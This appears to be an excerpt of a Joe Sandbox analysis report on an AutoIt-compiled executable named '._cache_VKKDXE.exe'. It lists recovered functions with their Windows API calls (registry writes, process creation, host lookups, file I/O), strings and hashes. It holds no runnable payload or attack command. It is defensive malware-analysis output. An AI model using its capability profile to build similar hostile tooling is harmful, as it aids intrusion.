Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: c46cc25d9fe3dcc1fc52f040f11374f4f5e80c613d483bb16ae942d336390b3e
Instruction ID: 348b0f4f19c914fbb52a54b59a7708e7c243613ce20d849f628f70ca32234787
Opcode Fuzzy Hash: c46cc25d9fe3dcc1fc52f040f11374f4f5e80c613d483bb16ae942d336390b3e
Instruction Fuzzy Hash: 0162AE70508341EFDB24DF24C885BAA77E5BF44304F08496DF98A9B296DB75D888CB72

Function 00D76A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00D76C73
___createFile.LIBCMT ref: 00D76CB4
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00D76CDD
__dosmaperr.LIBCMT ref: 00D76CE4
GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00D76CF7
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00D76D1A
__dosmaperr.LIBCMT ref: 00D76D23
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00D76D2C
__set_osfhnd.LIBCMT ref: 00D76D5C
__lseeki64_nolock.LIBCMT ref: 00D76DC6
__close_nolock.LIBCMT ref: 00D76DEC
__chsize_nolock.LIBCMT ref: 00D76E1C
__lseeki64_nolock.LIBCMT ref: 00D76E2E
__lseeki64_nolock.LIBCMT ref: 00D76F26
__lseeki64_nolock.LIBCMT ref: 00D76F3B
__close_nolock.LIBCMT ref: 00D76F9B

Part of subcall function 00D6F84C: CloseHandle.KERNEL32(00000000,00DEEEC4,00000000,?,00D76DF1,00DEEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00D6F89C
Part of subcall function 00D6F84C: GetLastError.KERNEL32(?,00D76DF1,00DEEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00D6F8A6
Part of subcall function 00D6F84C: __free_osfhnd.LIBCMT ref: 00D6F8B3
Part of subcall function 00D6F84C: __dosmaperr.LIBCMT ref: 00D6F8D5

Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E

__lseeki64_nolock.LIBCMT ref: 00D76FBD
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00D770F2
___createFile.LIBCMT ref: 00D77111
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00D7711E
__dosmaperr.LIBCMT ref: 00D77125
__free_osfhnd.LIBCMT ref: 00D77145
__invoke_watson.LIBCMT ref: 00D77173
__wsopen_helper.LIBCMT ref: 00D7718D

Strings

@, xrefs: 00D76D48

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: e41defd23fcc94dd2b58829a11eaf5c9ffff7f68fcd5a7e8be84a8b196019375
Instruction ID: 2a286ded02cfdaf79ef768f881c4b91c3232c3386288db261edeaed883024f64
Opcode Fuzzy Hash: e41defd23fcc94dd2b58829a11eaf5c9ffff7f68fcd5a7e8be84a8b196019375
Instruction Fuzzy Hash: 042223719046069BEB258F68DC52BAE7B71EB01320F28C229E569EB2D1F735CD40D771

Function 00D876DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00D876ED
GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00D87713
_wcscpy.LIBCMT ref: 00D87741
_wcscmp.LIBCMT ref: 00D8774C
_wcscat.LIBCMT ref: 00D87762
_wcsstr.LIBCMT ref: 00D8776D
755A1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00D87789
_wcscat.LIBCMT ref: 00D877D2
_wcscat.LIBCMT ref: 00D877D9
_wcsncpy.LIBCMT ref: 00D87804

Strings

\VarFileInfo\Translation, xrefs: 00D87781
DefaultLangCodepage, xrefs: 00D877EC
StringFileInfo\, xrefs: 00D8775C
%u.%u.%u.%u, xrefs: 00D87867
04090000, xrefs: 00D877BF

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$A1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1513093770-1459072770
Opcode ID: 20b37384b757f39f0ab458e4156a2a6e90def36cc9f5cb109160c4def72552f5
Instruction ID: 958b6305e5b02091e15d9d49af0f23b74c2cf3fc96190c44d377785d73f099e3
Opcode Fuzzy Hash: 20b37384b757f39f0ab458e4156a2a6e90def36cc9f5cb109160c4def72552f5
Instruction Fuzzy Hash: 3C41B1729042057FEB01B7649C47EBF7BACEF59710F28406AF901E6192EB64DA01DBB1

Function 00D41F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

GetForegroundWindow.USER32 ref: 00D41FBE
IsWindow.USER32(?), ref: 00DB282E

Strings

INSTANCE, xrefs: 00DB276D
REGEXPCLASS, xrefs: 00DB267A
TITLE, xrefs: 00DB27C3
ALL, xrefs: 00DB2795
HANDLE, xrefs: 00DB2613
LAST, xrefs: 00DB25E7
ACTIVE, xrefs: 00DB25FD
REGEXPTITLE, xrefs: 00DB2629
CLASS, xrefs: 00DB2659

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 07c4917504e22d09c901492f80529a4814b7dd658bedcff36823a06f5474d59d
Instruction ID: f9437fa89bf8e367f4d682c3cd71cd4bab098e68f573f622180ae71bcbe5991c
Opcode Fuzzy Hash: 07c4917504e22d09c901492f80529a4814b7dd658bedcff36823a06f5474d59d
Instruction Fuzzy Hash: 53D1D975504702DBCB04EF10C891AFABBA1FF58344F144A2DF896576A1DB30E999CBB2

Function 00DA352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DA3626
RegCreateKeyExW.KERNEL32(?,?,00000000,00DDDBF0,00000000,?,00000000,?,?), ref: 00DA3694
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00DA36DC
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00DA3765
RegCloseKey.ADVAPI32(?), ref: 00DA3A85
RegCloseKey.ADVAPI32(00000000), ref: 00DA3A92

Strings

REG_EXPAND_SZ, xrefs: 00DA3702
REG_QWORD, xrefs: 00DA39D3
REG_SZ, xrefs: 00DA37A3
REG_MULTI_SZ, xrefs: 00DA384D
REG_BINARY, xrefs: 00DA3A20
REG_DWORD, xrefs: 00DA3956

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 3a9964bfe57c55d0803d591f8dfb69676afc87ff3628f6dd60239bbf19ebb2ac
Instruction ID: d894c95baef249343d783da83ad46a95a2fd296084e9662a6378973df90d9c74
Opcode Fuzzy Hash: 3a9964bfe57c55d0803d591f8dfb69676afc87ff3628f6dd60239bbf19ebb2ac
Instruction Fuzzy Hash: B1025E756046119FCB14EF28C895E2AB7E6FF89720F04845DF88A9B361DB34ED05CBA1

Function 00D44257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_VKKDXE.exe,00000104,?,00000000,00000001,00000000), ref: 00D4428C

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

Part of subcall function 00D61BC7: __wcsicmp_l.LIBCMT ref: 00D61C50

_wcscpy.LIBCMT ref: 00D443C0
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_VKKDXE.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00DB214E

Strings

/AutoIt3OutputDebug, xrefs: 00D44360
/AutoIt3ExecuteLine, xrefs: 00D44375
/AutoIt3ExecuteScript, xrefs: 00D4438A
CMDLINE, xrefs: 00D442DA, 00D442DF, 00D4430D
CMDLINERAW, xrefs: 00D442AD
/ErrorStdOut, xrefs: 00D4434B
C:\Users\user\Desktop\._cache_VKKDXE.exe, xrefs: 00D44283, 00D44288, 00D44292, 00D443BB, 00D443D9, 00DB213B, 00DB2192

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_VKKDXE.exe$CMDLINE$CMDLINERAW
API String ID: 861526374-314723470
Opcode ID: 8f5b508bcea02c056829d2562649c23b8c27d83fb98143e28c340deeee5e84f3
Instruction ID: 3ee6ce9fdffe0eb86c3ce9c163a28f87083e0a1006e328ce77450c329ac147e0
Opcode Fuzzy Hash: 8f5b508bcea02c056829d2562649c23b8c27d83fb98143e28c340deeee5e84f3
Instruction Fuzzy Hash: 15818072800219ABCB05EBE4CD96EEF77B8EF15350F140016F545B7192EF606A48CBB2

Function 00D5E975 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00D5EA39
__wsplitpath.LIBCMT ref: 00D5EA56

Part of subcall function 00D6297D: __wsplitpath_helper.LIBCMT ref: 00D629BD

_wcsncat.LIBCMT ref: 00D5EA69
__makepath.LIBCMT ref: 00D5EA85

Part of subcall function 00D62BFF: __wmakepath_s.LIBCMT ref: 00D62C13

Part of subcall function 00D6010A: std::exception::exception.LIBCMT ref: 00D6013E
Part of subcall function 00D6010A: __CxxThrowException@8.LIBCMT ref: 00D60153

_wcscpy.LIBCMT ref: 00D5EABE

Part of subcall function 00D5EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00D5EADA,?,?), ref: 00D5EB27

_wcscat.LIBCMT ref: 00DB32FC
_wcscat.LIBCMT ref: 00DB3334
_wcsncpy.LIBCMT ref: 00DB3370

Strings

Include, xrefs: 00D5EA63
\, xrefs: 00DB3321
", xrefs: 00D5EAEB

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
String ID: Include$\$"
API String ID: 1213536620-2474423117
Opcode ID: 8ff807f016eabf877ed9d4424308a389e0cea989d175c44e09acc88b161f37bd
Instruction ID: bb65bbf5bdabbca99ef5ab959040749abaea03f3c910da753813cec8d287f6d9
Opcode Fuzzy Hash: 8ff807f016eabf877ed9d4424308a389e0cea989d175c44e09acc88b161f37bd
Instruction Fuzzy Hash: 7D5180B14043419FC704EF9AEC89C9B77E8FB59300B40452EF645A3261EB79968CCB76

Function 00D878EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00D87909
gethostname.WS2_32(?,00000100), ref: 00D87923
gethostbyname.WS2_32(?), ref: 00D87930
_wcscpy.LIBCMT ref: 00D87958
_memmove.LIBCMT ref: 00D8796B
inet_ntoa.WS2_32(?), ref: 00D87976
_strcat.LIBCMT ref: 00D87984
_wcscpy.LIBCMT ref: 00D8799B
WSACleanup.WS2_32 ref: 00D879A9
_wcscpy.LIBCMT ref: 00D879B7

Strings

0.0.0.0, xrefs: 00D87952

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: b7c7eec835a5ee91ef474e22e494b99ae18a9d6b3bd70709bad766782827e115
Instruction ID: e8b91eca3a4104e0fb7a29949324907fcf0eef5ec03a2634eda602b55c59522c
Opcode Fuzzy Hash: b7c7eec835a5ee91ef474e22e494b99ae18a9d6b3bd70709bad766782827e115
Instruction Fuzzy Hash: 8811D231908226AFDB24B7749C4AEEA77ACEB41720F1500A6F456D6191EF70DA858BB0

Function 00D430A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D430B0
LoadCursorW.USER32(00000000,00007F00), ref: 00D430BF
LoadIconW.USER32(00000063), ref: 00D430D5
LoadIconW.USER32(000000A4), ref: 00D430E7
LoadIconW.USER32(000000A2), ref: 00D430F9

Part of subcall function 00D4318A: LoadImageW.USER32(00D40000,00000063,00000001,00000010,00000010,00000000), ref: 00D431AE

RegisterClassExW.USER32(?), ref: 00D43167

Part of subcall function 00D42F58: GetSysColorBrush.USER32(0000000F), ref: 00D42F8B
Part of subcall function 00D42F58: RegisterClassExW.USER32(00000030), ref: 00D42FB5
Part of subcall function 00D42F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D42FC6
Part of subcall function 00D42F58: LoadIconW.USER32(000000A9), ref: 00D43009

Strings

0, xrefs: 00D43139
#, xrefs: 00D43140
AutoIt v3, xrefs: 00D43156

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 06e228a0ca7d3168528f19a9ab7f44fd13d49dd77c7a865a8a42ccae38c279db
Instruction ID: 3d2ea7cbb7c45362fc4d566c974d517fb40215225843a0c0bcf8add72c77de37
Opcode Fuzzy Hash: 06e228a0ca7d3168528f19a9ab7f44fd13d49dd77c7a865a8a42ccae38c279db
Instruction Fuzzy Hash: A9214770D01305AFCB04DFAAEC49A99BFF5FB48310F00816AE615B73A0D77659888FA1

Function 00D9B74B Relevance: 15.3, APIs: 10, Instructions: 324
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 00D9B777
CoInitialize.OLE32(00000000), ref: 00D9B7A4
CoUninitialize.COMBASE ref: 00D9B7AE
GetRunningObjectTable.OLE32(00000000,?), ref: 00D9B8AE
SetErrorMode.KERNEL32(00000001,00000029), ref: 00D9B9DB
CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00D9BA0F
CoGetObject.OLE32(?,00000000,00DCD91C,?), ref: 00D9BA32
SetErrorMode.KERNEL32(00000000), ref: 00D9BA45
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00D9BAC5
VariantClear.OLEAUT32(00DCD91C), ref: 00D9BAD5

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: a7d3acff8ea680cb4a71bf99dbc52b8a21c860a25605302991bb3c8f55af5459
Instruction ID: cc2069923781041fe1e4075f8b387a8717bbdbe5a35d044e84dd8863d41e0950
Opcode Fuzzy Hash: a7d3acff8ea680cb4a71bf99dbc52b8a21c860a25605302991bb3c8f55af5459
Instruction Fuzzy Hash: 6FC10471604305AFCB00DF68D98492AB7E9FF88714F05492EF98ADB251DB71ED05CB62

Function 00D42F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D42F8B
RegisterClassExW.USER32(00000030), ref: 00D42FB5
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D42FC6
LoadIconW.USER32(000000A9), ref: 00D43009

Strings

TaskbarCreated, xrefs: 00D42FBB
+, xrefs: 00D42F74
0, xrefs: 00D42F6D
AutoIt v3 GUI, xrefs: 00D42FA7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: d36afc68b0ab6d2ecd8b49f1630c27dd2f94be672fbf3eeadef7fb164956e675
Instruction ID: a67735a16f6dc5db180e0d604f71d03dc8df42a25d49bdd5de45e0716d236895
Opcode Fuzzy Hash: d36afc68b0ab6d2ecd8b49f1630c27dd2f94be672fbf3eeadef7fb164956e675
Instruction Fuzzy Hash: 5621B7B590031AAFDB009F95EC89BCDBBB5FB08700F10815AF515EA3A0D7B14688CFA5

Function 00DA23C5 Relevance: 13.9, APIs: 9, Instructions: 376
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00DA23E6
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DA2579
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DA259D
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DA25DD
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DA25FF
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DA2760
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00DA2792
CloseHandle.KERNEL32(?), ref: 00DA27C1
CloseHandle.KERNEL32(?), ref: 00DA2838

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
